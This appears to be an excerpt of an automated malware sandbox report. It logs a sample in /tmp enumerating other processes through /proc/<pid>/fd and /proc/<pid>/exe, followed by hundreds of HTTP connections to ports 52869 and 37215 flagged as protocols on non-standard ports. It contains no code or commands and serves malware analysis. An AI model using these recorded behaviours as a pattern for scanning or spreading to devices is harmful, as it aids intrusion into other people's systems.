Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2025/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2146/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2146/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2146/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/910/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/912/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/759/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/759/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/759/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/517/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/918/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5272/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5274/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1594/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1594/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1594/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2285/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2285/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2281/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2281/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5270/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5271/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1349/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1349/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1349/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1623/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1623/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1623/exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59448 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41488 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46468
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36614 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34004 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36616 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58396 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56648 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48994 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57370 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 57370
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47398 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55950 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33776 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35428 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34166 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34166
Source: unknown	Network traffic detected: HTTP traffic on port 34168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34166
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34168
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34168
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60976 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
